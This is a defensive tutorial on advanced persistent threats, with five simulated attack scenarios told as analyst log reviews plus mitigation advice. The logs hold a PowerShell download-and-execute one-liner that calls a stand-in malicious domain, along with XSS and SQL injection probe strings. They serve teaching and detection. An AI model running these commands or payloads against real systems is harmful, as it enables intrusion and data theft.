UNDERSTANDING

ADVANCED
PERSISTENT
THREAT (APT) IN
CYBERSECURITY
WITH EXAMPLES
AND
SIMULATIONS
BY IZZMIER IZZUDDIN
KEY CHARACTERISTICS OF APT:

1. Advanced: The attackers use advanced techniques to exploit vulnerabilities,

including zero-day exploits, spear-phishing, and custom malware. They may also
employ various evasion techniques to avoid detection.
2. Persistent: Unlike traditional cyberattacks that are short-lived, APTs involve a long-
term presence in the target's environment. The attackers establish persistence by
using various methods, such as creating backdoors and obtaining valid user
credentials.
3. Targeted: APTs are highly targeted, often focusing on specific organisations,
industries, or even individuals. The attackers conduct extensive reconnaissance to
understand the target's network, identify valuable data, and plan their attack
accordingly.

TYPICAL STAGES OF AN APT ATTACK:

1. Reconnaissance: The attackers gather information about the target organisation,

its network, employees, and potential vulnerabilities. This may involve passive
methods like OSINT (Open Source Intelligence) or active methods like network
scanning and phishing.
2. Initial Compromise: The attackers gain initial access to the target network,
typically through spear-phishing, exploiting vulnerabilities, or using stolen
credentials.
3. Establishing Persistence: The attackers establish a foothold in the network by
installing backdoors, web shells, or creating new user accounts. This ensures they
can maintain access even if some entry points are discovered and closed.
4. Privilege Escalation: The attackers seek to escalate their privileges within the
network to gain higher levels of access and control. This may involve exploiting
additional vulnerabilities or using legitimate tools and credentials.
5. Lateral Movement: The attackers move laterally through the network to find and
access other systems and data. They may use techniques like Pass-the-Hash, Pass-
the-Ticket, or exploiting trust relationships between systems.
6. Data Exfiltration: The attackers identify and extract valuable data from the target
network. This may involve compressing and encrypting data before transferring it to
external servers controlled by the attackers.
7. Cleanup: The attackers attempt to cover their tracks by deleting logs, removing
tools, and taking other actions to avoid detection and attribution.

HERE IS A LIST OF SOME WELL-KNOWN APT GROUPS:

1. APT1 (Comment Crew)

2. APT3 (Buckeye)

3. APT10 (Stone Panda)

4. APT28 (Fancy Bear)

5. APT29 (Cozy Bear)

6. APT32 (OceanLotus)

7. APT33 (Elfin)

8. APT34 (OilRig)

9. APT35 (Charming Kitten)

10. APT36 (Transparent Tribe)

11. APT37 (Reaper)

12. APT38 (Lazarus Group)

13. APT39 (Chafer)

14. APT40 (Periscope)

15. APT41 (Double Dragon)

EXAMPLES WITH SCENARIO AND SIMULATIONS

Scenario 1: APT29 Attack on a Financial Institution

Stage 1: Reconnaissance

Objective: Gather information about the target environment.

Logs and Analysis:

• Network Traffic Logs:

o Detection of suspicious activity scanning for open ports on the financial
institution’s public web servers.
o Time: 2024-08-01 09:00:00
o Source IP: 185.70.40.10
o Destination IP: 10.0.0.100
o Ports Scanned: 80, 443, 3389

Analyst Comment: The scanning of ports 80 (HTTP), 443 (HTTPS), and 3389 (RDP)
indicates reconnaissance activity to find vulnerable services.

Stage 2: Initial Compromise

Objective: Gain initial access through spear-phishing.

Logs and Analysis:

• Email Gateway Logs:

o Spear-phishing email sent to a senior executive.
o Time: 2024-08-01 10:05:12
o From: attacker@phishingdomain.com
o To: executive@financecorp.com
o Subject: Urgent: Updated Financial Report
o Attachment: Financial_Report.doc (contains malicious macro)
• Endpoint Security Logs:
o Execution of the malicious macro leading to the download of a Cobalt
Strike beacon.
o Time: 2024-08-01 10:10:30
o Source IP: 10.0.0.101
o Destination URL: http://maliciousdomain.com/beacon

Analyst Comment: The spear-phishing email with a malicious macro attachment

resulted in the download and execution of a Cobalt Strike beacon, indicating a
successful initial compromise.

Stage 3: Establishing Persistence

Objective: Ensure continuous access to the compromised system.

Logs and Analysis:

• EDR Logs:
o Creation of a scheduled task to maintain persistence.
o Time: 2024-08-01 10:30:45
o Host: EXEC-PC
o Task Name: UpdateChecker
o Command: C:\Windows\System32\cmd.exe /c powershell -nop -w
hidden -c "IEX (New-Object
Net.WebClient).DownloadString('http://maliciousdomain.com/payload')"

Analyst Comment: The creation of a scheduled task named "UpdateChecker" with a

command to download a payload indicates the attacker is establishing persistence.

Stage 4: Privilege Escalation

Objective: Escalate privileges using a known exploit.

Logs and Analysis:

• EDR Logs:
o Execution of an exploit for privilege escalation.
o Time: 2024-08-01 11:00:25
o Host: EXEC-PC
o Process: exploit.exe
o Privileges: SYSTEM

Analyst Comment: The execution of a privilege escalation exploit resulted in SYSTEM-

level privileges, allowing the attacker full control over the compromised system.

Stage 5: Lateral Movement

Objective: Move through the network to access sensitive financial data.

Logs and Analysis:

• Network Traffic Logs:

o Unusual SMB connections from the compromised executive's PC to the
financial data server.
o Time: 2024-08-01 11:30:00
o Source IP: 10.0.0.101
o Destination IP: 10.0.0.200
o Protocol: SMB

Analyst Comment: The unexpected SMB connections from the compromised PC to the
financial data server indicate lateral movement within the network.

Stage 6: Data Exfiltration

Objective: Extract sensitive financial data.

Logs and Analysis:

• Network Traffic Logs:

o Large data transfers to an external server using HTTPS.
o Time: 2024-08-01 12:00:45
o Source IP: 10.0.0.200
o Destination IP: 185.70.40.20 (attacker-controlled server)
o Data Transferred: 5GB

Analyst Comment: The significant data transfer to an external server using HTTPS
indicates data exfiltration activities.

Stage 7: Cleanup

Objective: Remove traces of the attack to evade detection.

Logs and Analysis:

• Windows Event Logs:

o Deletion of system logs using a log cleaning tool.
o Time: 2024-08-01 12:30:55
o Host: EXEC-PC
o Event ID: 1102
o Action: System Event Log Cleared

Analyst Comment: The clearing of system event logs using a tool indicates the attacker
is attempting to cover their tracks.

Full Analysis by Cybersecurity Analyst

Summary of Attack: The attack began with reconnaissance, where the attacker
scanned public web servers for open ports. The initial compromise was achieved
through a spear-phishing email targeting a senior executive, leading to the execution of
a Cobalt Strike beacon. Persistence was established by creating a scheduled task to
download a payload. The attacker escalated privileges to SYSTEM using a known exploit
and moved laterally within the network by making SMB connections to the financial
data server. Data exfiltration occurred via large data transfers to an external server
using HTTPS. Finally, the attacker attempted to clean up by deleting system event logs.

Recommendations:

1. Email Security:
o Implement advanced email filtering and phishing protection.
o Conduct regular phishing awareness training for employees, especially
high-ranking executives.
2. Endpoint Protection:
 o Deploy and configure robust EDR solutions to detect and block
suspicious activities, such as the execution of malicious macros and
exploits.
o Regularly update and patch all systems to prevent the exploitation of
known vulnerabilities.
3. Network Monitoring:
o Monitor network traffic for unusual patterns, such as unexpected SMB
connections and large data transfers.
o Implement network segmentation to limit the spread of lateral
movement.
4. Log Management:
o Ensure comprehensive logging and implement alerting mechanisms for
critical actions, such as the creation of scheduled tasks and log deletion.
o Regularly review logs to detect early signs of malicious activities.
5. Incident Response:
o Develop and regularly test an incident response plan, including
procedures for detecting and responding to APT attacks.
o Conduct threat hunting exercises to proactively identify potential threats.
6. Data Protection:
o Implement data loss prevention (DLP) solutions to monitor and prevent
unauthorised data transfers.
o Encrypt sensitive data both at rest and in transit to protect it from
exfiltration.

Tools Used by the Attacker:

• Cobalt Strike: For initial compromise and beacon deployment.

• PowerShell: For persistence with scheduled tasks.
• Exploit.exe: For privilege escalation.
• SMB Protocol: For lateral movement.
• HTTPS: For data exfiltration.
• Log Cleaning Tool: For cleanup and evasion.
Scenario 2: APT Attack on a Financial Institution

Stage 2: Reconnaissance

Objective: Gather information about the target environment.

Logs and Analysis:

• Network Traffic Logs:

o Detection of port scanning activity targeting the internal banking systems.
o Time: 2024-08-01 08:00:00
o Source IP: 203.0.113.150
o Destination IP: 192.168.2.100
o Ports Scanned: 80, 443, 1433 (SQL Server)
o Analyst Comment: The scanning of web and database ports indicates
reconnaissance to identify potential vulnerabilities.

Stage 2: Initial Compromise

Objective: Gain initial access through exploitation of a vulnerable employee portal.

Logs and Analysis:

• Web Server Logs:

o Detection of a Cross-Site Scripting (XSS) attack on the employee portal.
o Time: 2024-08-01 08:30:15
o Source IP: 203.0.113.150
o URL Accessed: /login?username=<script>alert('XSS')</script>
• Database Logs:
o Unauthorised access to employee credentials.
o Time: 2024-08-01 08:35:30
o User: compromised_user
o Query: SELECT * FROM employee_credentials
o Analyst Comment: The XSS attack allowed the attacker to steal
employee credentials.

Stage 3: Establishing Persistence

Objective: Ensure continuous access to the compromised system.

Logs and Analysis:

• Web Server Logs:

o Upload of a backdoor executable disguised as a legitimate file.
o Time: 2024-08-01 08:40:55
o Source IP: 203.0.113.150
o File Uploaded: /uploads/invoice.pdf.exe
 o Analyst Comment: The backdoor executable provides the attacker with
persistent access.

Stage 4: Privilege Escalation

Objective: Escalate privileges using a local exploit.

Logs and Analysis:

• EDR Logs:
o Execution of a known privilege escalation exploit.
o Time: 2024-08-01 09:00:45
o Host: Employee-PC
o Process: escalate_privileges.exe
o Privileges: Administrator
o Analyst Comment: The execution of the exploit resulted in administrative
privileges.

Stage 5: Lateral Movement

Objective: Move through the network to access core banking systems.

Logs and Analysis:

• Network Traffic Logs:

o Unusual SMB connections from the compromised employee PC to the
core banking server.
o Time: 2024-08-01 09:30:00
o Source IP: 192.168.2.50
o Destination IP: 192.168.2.20
o Protocol: SMB
o Analyst Comment: The unexpected SMB connections indicate lateral
movement.

Stage 6: Data Exfiltration

Objective: Extract sensitive financial data.

Logs and Analysis:

• Network Traffic Logs:

o Large data transfers to an external server using SFTP.
o Time: 2024-08-01 10:00:45
o Source IP: 192.168.2.20
o Destination IP: 198.51.100.100
o Protocol: SFTP
o Data Transferred: 3GB
 o Analyst Comment: The significant data transfer to an external server
indicates data exfiltration.

Stage 7: Cleanup

Objective: Remove traces of the attack to evade detection.

Logs and Analysis:

• Windows Event Logs:

o Deletion of system logs using a log cleaning tool.
o Time: 2024-08-01 10:30:55
o Host: Employee-PC
o Event ID: 1102
o Action: Event Log Cleared
o Analyst Comment: The clearing of event logs indicates an attempt to
cover tracks.

Full Analysis by Cybersecurity Analyst

Summary of Attack: The attack began with reconnaissance, where the attacker
scanned the financial institution’s internal systems for open ports. The initial
compromise was achieved through a Cross-Site Scripting (XSS) attack on the employee
portal, allowing the attacker to steal credentials. Persistence was established by
uploading a backdoor executable. The attacker then escalated privileges to an
administrator using a local exploit. Lateral movement was observed with SMB
connections from the compromised employee PC to the core banking server. Data
exfiltration occurred via SFTP, transferring sensitive financial data to an external server.
Finally, the attacker attempted to clean up by deleting system event logs.

Recommendations:

1. Web Application Security:

o Implement web application firewalls (WAF) to detect and block XSS and
other web-based attacks.
o Conduct regular security assessments and code reviews to identify and
fix vulnerabilities.
2. Endpoint Protection:
o Deploy and configure robust EDR solutions to detect and block
suspicious activities, such as the upload of backdoor executables and
execution of privilege escalation exploits.
o Regularly update and patch all systems to prevent the exploitation of
known vulnerabilities.
3. Network Monitoring:
o Monitor network traffic for unusual patterns, such as unexpected SMB
connections and large data transfers.
 o Implement network segmentation to limit the spread of lateral
movement.
4. Log Management:
o Ensure comprehensive logging and implement alerting mechanisms for
critical actions, such as log clearing and privilege escalation.
o Regularly review logs to detect early signs of malicious activities.
5. Incident Response:
o Develop and regularly test an incident response plan, including
procedures for detecting and responding to APT attacks.
o Conduct threat hunting exercises to proactively identify potential threats.
6. Data Protection:
o Implement data loss prevention (DLP) solutions to monitor and prevent
unauthorised data transfers.
o Encrypt sensitive data both at rest and in transit to protect it from
exfiltration.
Scenario 3: APT Attack on a Healthcare Organisation

Stage 1: Reconnaissance

Objective: Gather information about the target environment.

Logs and Analysis:

• Network Traffic Logs:

o Scanning for open ports on critical healthcare systems.

Time: 2024-08-01 09:00:00

Source IP: 203.0.113.100
Destination IP: 192.168.1.250
Ports Scanned: 80, 443, 3389

Analyst Comment: The scanning of ports 80 (HTTP), 443 (HTTPS), and 3389 (RDP)
indicates reconnaissance activity to find vulnerable services.

Stage 2: Initial Compromise

Objective: Gain initial access through exploitation of a vulnerable web application.

Logs and Analysis:

• Web Server Logs:

o Detection of SQL injection attempts on the patient management system.

Time: 2024-08-01 09:30:12

Source IP: 203.0.113.100
URL Accessed: /patients.php?id=1' OR '1'='1

• Database Logs:
o Unusual queries executed indicating SQL injection success.

Time: 2024-08-01 09:35:20

User: webapp
Query: SELECT * FROM users WHERE '1'='1'

Analyst Comment: The SQL injection attack on the patient management system
resulted in unauthorised access to the database.

Stage 3: Establishing Persistence

Objective: Ensure continuous access to the compromised system.

Logs and Analysis:

 • Web Server Logs:
o Upload of a web shell for remote access.

Time: 2024-08-01 09:40:45

Source IP: 203.0.113.100
URL Accessed: /uploads/shell.php

Analyst Comment: The upload of a web shell to the server indicates the attacker is
establishing persistence.

Stage 4: Privilege Escalation

Objective: Escalate privileges using a local exploit.

Logs and Analysis:

• EDR Logs:
o Execution of a known local privilege escalation exploit.

Time: 2024-08-01 10:00:25

Host: Web-Server
Process: exploit.exe
Privileges: SYSTEM

Analyst Comment: The execution of a local privilege escalation exploit resulted in

SYSTEM-level privileges.

Stage 5: Lateral Movement

Objective: Move through the network to access the Electronic Health Record (EHR)
system.

Logs and Analysis:

• Network Traffic Logs:

o Unusual RDP connections from the web server to the EHR server.

Time: 2024-08-01 10:30:00

Source IP: 192.168.1.250
Destination IP: 192.168.1.10
Protocol: RDP

Analyst Comment: The unexpected RDP connections from the web server to the EHR
server indicate lateral movement.

Stage 6: Data Exfiltration

Objective: Extract sensitive patient data.

Logs and Analysis:

• Network Traffic Logs:

o Data transfers to an external server using FTP.

Time: 2024-08-01 11:00:45

Source IP: 192.168.1.10
Destination IP: 198.51.100.50
Protocol: FTP
Data Transferred: 2GB

Analyst Comment: The significant data transfer to an external server using FTP
indicates data exfiltration.

Stage 7: Cleanup

Objective: Remove traces of the attack to evade detection.

Logs and Analysis:

• Windows Event Logs:

o Removal of logs using a log cleaning tool.

Time: 2024-08-01 11:30:55

Host: Web-Server
Event ID: 1102
Action: Event Log Cleared

Analyst Comment: The clearing of event logs using a tool indicates the attacker is
attempting to cover their tracks.

Full Analysis by Cybersecurity Analyst

Summary of Attack:

The attack began with reconnaissance, where the attacker scanned critical healthcare
systems for open ports. The initial compromise was achieved through an SQL injection
attack on the patient management system, allowing the attacker to access the
database. Persistence was established by uploading a web shell to the server. The
attacker then escalated privileges to SYSTEM using a local exploit. Lateral movement
was observed with RDP connections from the web server to the EHR server. Data
exfiltration occurred via FTP, transferring sensitive patient data to an external server.
Finally, the attacker attempted to clean up by using a log cleaning tool to delete event
logs.

Recommendations:

1. Web Application Security:

 o Implement web application firewalls (WAF) to detect and block SQL
injection attempts.
o Conduct regular security assessments and code reviews to identify and
fix vulnerabilities.
2. Endpoint Protection:
o Deploy and configure robust EDR solutions to detect and block
suspicious activities, such as the upload of web shells and execution of
exploits.
o Regularly update and patch all systems to prevent the exploitation of
known vulnerabilities.
3. Network Monitoring:
o Monitor network traffic for unusual patterns, such as unexpected RDP
connections and large data transfers.
o Implement network segmentation to limit the spread of lateral
movement.
4. Log Management:
o Ensure comprehensive logging and implement alerting mechanisms for
critical actions, such as log clearing and privilege escalation.
o Regularly review logs to detect early signs of malicious activities.
5. Incident Response:
o Develop and regularly test an incident response plan, including
procedures for detecting and responding to APT attacks.
o Conduct threat hunting exercises to proactively identify potential threats.
6. Data Protection:
o Implement data loss prevention (DLP) solutions to monitor and prevent
unauthorised data transfers.
o Encrypt sensitive data both at rest and in transit to protect it from
exfiltration.
Scenario 4: APT Attack on a Financial Institution

Stage 1: Reconnaissance

Objective: Gather information about the target environment.

Logs and Analysis:

• Network Traffic Logs:

o Detection of unusual outbound connections to suspicious IP addresses.

Time: 2024-08-01 08:45:00

Source IP: 192.168.2.100
Destination IP: 205.185.123.45
Ports Scanned: 22, 23, 80, 443

Analyst Comment: The repeated connections to suspicious IP addresses and the

scanning of ports 22 (SSH), 23 (Telnet), 80 (HTTP), and 443 (HTTPS) indicate
reconnaissance activity to identify vulnerable services.

Stage 2: Initial Compromise

Objective: Gain initial access through a malicious email attachment.

Logs and Analysis:

• Email Gateway Logs:

o Detection of a phishing email with a malicious attachment targeting the
finance department.

Time: 2024-08-01 09:15:30

From: attacker@maliciousdomain.com
To: finance@bank.com
Subject: Urgent: Invoice Payment
Attachment: invoice.xlsm (SHA256: 1a2b3c4d5e...)

• EDR Logs:
o Execution of a macro from the malicious Excel attachment.

Time: 2024-08-01 09:20:45

Host: Finance-PC
Process: EXCEL.EXE
Action: Executed macro

Analyst Comment: The execution of a macro from a suspicious Excel attachment

suggests a successful phishing attack leading to initial compromise.

Stage 3: Establishing Persistence

Objective: Ensure continuous access to the compromised system.

Logs and Analysis:

• Windows Event Logs:

o Creation of a new scheduled task for persistence.

Time: 2024-08-01 09:45:00

Host: Finance-PC
Event ID: 4698
Task Name: SystemUpdate
Action: Scheduled Task Created

Analyst Comment: The creation of a scheduled task named "SystemUpdate" is a

common method used by attackers to maintain persistence on a compromised system.

Stage 4: Privilege Escalation

Objective: Escalate privileges using a known vulnerability.

Logs and Analysis:

• EDR Logs:
o Execution of a privilege escalation exploit.

Time: 2024-08-01 10:00:25

Host: Finance-PC
Process: exploit.exe
Privileges: SYSTEM

Analyst Comment: The execution of a privilege escalation exploit to gain SYSTEM-level

privileges is a clear indicator of the attacker's intent to escalate their access.

Stage 5: Lateral Movement

Objective: Move through the network to access critical financial systems.

Logs and Analysis:

• Network Traffic Logs:

o Detection of SMB traffic indicating lateral movement.

Time: 2024-08-01 10:30:00

Source IP: 192.168.2.100
Destination IP: 192.168.2.150
Protocol: SMB
Action: File access
Analyst Comment: The increase in SMB traffic between internal systems, especially
file access attempts, indicates potential lateral movement.

Stage 6: Data Exfiltration

Objective: Extract sensitive financial data.

Logs and Analysis:

• Network Traffic Logs:

o Large data transfers to an external server.

Time: 2024-08-01 11:00:45

Source IP: 192.168.2.150
Destination IP: 203.0.113.77
Data Transferred: 1.5GB

Analyst Comment: The significant data transfer to an external server is a strong

indicator of data exfiltration activities.

Stage 7: Cleanup

Objective: Remove traces of the attack to evade detection.

Logs and Analysis:

• Windows Event Logs:

o Use of log cleaning tool to delete system logs.

Time: 2024-08-01 11:30:55

Host: Finance-PC
Event ID: 1102
Action: System Event Log Cleared

Analyst Comment: The clearing of system event logs using a log cleaning tool indicates
the attacker is attempting to cover their tracks.

Full Analysis by Cybersecurity Analyst

Summary of Attack:

The attack began with reconnaissance, where the attacker scanned for open ports on
the financial institution's systems. The initial compromise was achieved through a
phishing email containing a malicious Excel attachment that executed a macro.
Persistence was established by creating a scheduled task named "SystemUpdate." The
attacker then escalated privileges to SYSTEM using a known exploit. Lateral movement
was observed with SMB traffic between internal systems. Data exfiltration occurred via
large data transfers to an external server. Finally, the attacker attempted to clean up by
clearing system event logs.

Recommendations:

1. Email Security:
o Implement advanced email filtering and phishing protection.
o Conduct regular phishing awareness training for employees, especially
those in sensitive departments like finance.
2. Endpoint Protection:
o Deploy and configure robust EDR solutions to detect and block
suspicious activities, such as the creation of unauthorised scheduled
tasks and execution of macros.
o Regularly update and patch all systems to prevent the exploitation of
known vulnerabilities.
3. Network Monitoring:
o Monitor network traffic for unusual patterns, such as large data transfers
to external destinations.
o Implement network segmentation to limit the spread of lateral
movement.
4. Log Management:
o Ensure comprehensive logging and implement alerting mechanisms for
critical actions, such as privilege escalation and log clearing.
o Regularly review logs to detect early signs of malicious activities.
5. Incident Response:
o Develop and regularly test an incident response plan, including
procedures for detecting and responding to APT attacks.
o Conduct threat hunting exercises to proactively identify potential threats.
6. Data Protection:
o Implement data loss prevention (DLP) solutions to monitor and prevent
unauthorised data transfers.
o Encrypt sensitive data both at rest and in transit to protect it from
exfiltration.
Scenario 5: APT Attack on a Power Utility Company

Stage 1: Reconnaissance

Objective: Gather information about the target environment.

Logs and Analysis:

• Network Traffic Logs:

o Unusual DNS queries to gather information about internal network
structure.

Time: 2024-08-01 08:30:00

Source IP: 192.168.100.10
Queried Domain: internal.power-utility.com

Analyst Comment: The repeated DNS queries for internal domains suggest
reconnaissance to map the internal network.

Stage 2: Initial Compromise

Objective: Gain initial access through exploitation of a vulnerable remote desktop

protocol (RDP) service.

Logs and Analysis:

• Windows Security Logs:

o Brute-force attempts on RDP service detected.

Time: 2024-08-01 09:00:00

Host: SCADA-Server
Event ID: 4625
Logon Type: 10 (RemoteInteractive)
Status: 0xC000006A (Incorrect password)

• Network Traffic Logs:

o Successful RDP connection after multiple failed attempts.

Time: 2024-08-01 09:05:00

Source IP: 203.0.113.200
Destination IP: 192.168.100.20
Protocol: RDP

Analyst Comment: The successful RDP connection following brute-force attempts

indicates the attacker has gained initial access to the SCADA server.

Stage 3: Establishing Persistence

Objective: Ensure continuous access to the compromised system.

Logs and Analysis:

• Windows Event Logs:

o Installation of a remote access tool (RAT) for persistence.

Time: 2024-08-01 09:30:00

Host: SCADA-Server
Event ID: 7045
Service Name: RemoteAccessService
Binary Path: C:\Windows\System32\RemoteAccess.exe

Analyst Comment: The installation of a service named "RemoteAccessService" is a

method used by attackers to maintain persistence on the compromised system.

Stage 4: Privilege Escalation

Objective: Escalate privileges using a known vulnerability.

Logs and Analysis:

• EDR Logs:
o Execution of a privilege escalation exploit.

Time: 2024-08-01 10:00:00

Host: SCADA-Server
Process: escalate.exe
Privileges: SYSTEM

Analyst Comment: The execution of a privilege escalation exploit to gain SYSTEM-level

privileges indicates the attacker is escalating their access.

Stage 5: Lateral Movement

Objective: Move through the network to access critical operational technology (OT)
systems.

Logs and Analysis:

• Network Traffic Logs:

o Unusual SMB traffic indicating lateral movement.

Time: 2024-08-01 10:30:00

Source IP: 192.168.100.20
Destination IP: 192.168.100.30
Protocol: SMB
Action: File access
Analyst Comment: The increase in SMB traffic between internal systems, especially
file access attempts, suggests lateral movement.

Stage 6: Data Exfiltration

Objective: Extract sensitive operational data.

Logs and Analysis:

• Network Traffic Logs:

o Large data transfers to an external server.

Time: 2024-08-01 11:00:00

Source IP: 192.168.100.30
Destination IP: 198.51.100.75
Data Transferred: 3GB

Analyst Comment: The significant data transfer to an external server is a strong

indicator of data exfiltration activities.

Stage 7: Disruption

Objective: Disrupt operations by altering control system configurations.

Logs and Analysis:

• SCADA System Logs:

o Unauthorised changes to control system configurations.

Time: 2024-08-01 11:30:00

User: SYSTEM
Action: Configuration Change
Details: Altered control parameters for power distribution

Analyst Comment: The unauthorised changes to control system configurations

indicate an attempt to disrupt operations.

Stage 8: Cleanup

Objective: Remove traces of the attack to evade detection.

Logs and Analysis:

• Windows Event Logs:

o Use of a log cleaning tool to delete system logs.

Time: 2024-08-01 12:00:00

Host: SCADA-Server
Event ID: 1102
Action: System Event Log Cleared

Analyst Comment: The clearing of system event logs using a log cleaning tool indicates
the attacker is attempting to cover their tracks.

Full Analysis by Cybersecurity Analyst

Summary of Attack:

The attack began with reconnaissance, where the attacker used DNS queries to map
the internal network. The initial compromise was achieved through brute-force
attempts on the RDP service of the SCADA server, leading to a successful connection.
Persistence was established by installing a remote access tool (RAT) named
"RemoteAccessService." The attacker then escalated privileges to SYSTEM using a
known exploit. Lateral movement was observed with SMB traffic between internal
systems. Data exfiltration occurred via large data transfers to an external server. The
attacker then made unauthorised changes to the control system configurations,
leading to potential disruption of operations. Finally, the attacker attempted to clean up
by using a log cleaning tool to delete system event logs.

Recommendations:

1. Access Control:
o Implement multi-factor authentication (MFA) for remote access services
like RDP.
o Restrict RDP access to only necessary users and systems, and
implement strong password policies.
2. Endpoint Protection:
o Deploy and configure robust EDR solutions to detect and block
suspicious activities, such as brute-force attempts and the installation of
unauthorised services.
o Regularly update and patch all systems to prevent the exploitation of
known vulnerabilities.
3. Network Monitoring:
o Monitor network traffic for unusual patterns, such as increased SMB
traffic and large data transfers to external destinations.
o Implement network segmentation to limit the spread of lateral
movement.
4. Log Management:
o Ensure comprehensive logging and implement alerting mechanisms for
critical actions, such as privilege escalation and log clearing.
o Regularly review logs to detect early signs of malicious activities.
5. Incident Response:
o Develop and regularly test an incident response plan, including
procedures for detecting and responding to APT attacks on critical
infrastructure.
 o Conduct threat hunting exercises to proactively identify potential threats.
6. Data Protection:
o Implement data loss prevention (DLP) solutions to monitor and prevent
unauthorised data transfers.
o Encrypt sensitive operational data both at rest and in transit to protect it
from exfiltration.
7. SCADA Security:
o Regularly audit and monitor SCADA system configurations for
unauthorised changes.
o Implement strict access controls and monitoring for SCADA systems to
prevent unauthorised access and configuration changes.